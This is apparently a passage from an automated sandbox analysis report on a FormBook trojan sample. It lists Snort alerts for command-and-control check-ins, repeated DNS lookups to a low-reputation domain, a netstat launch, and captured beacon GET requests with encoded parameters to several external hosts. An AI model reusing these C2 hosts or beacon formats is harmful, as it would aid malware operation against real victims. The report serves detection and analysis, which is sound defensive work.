          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mobiessence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.trendyheld.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.beastninjas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.importexportasia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: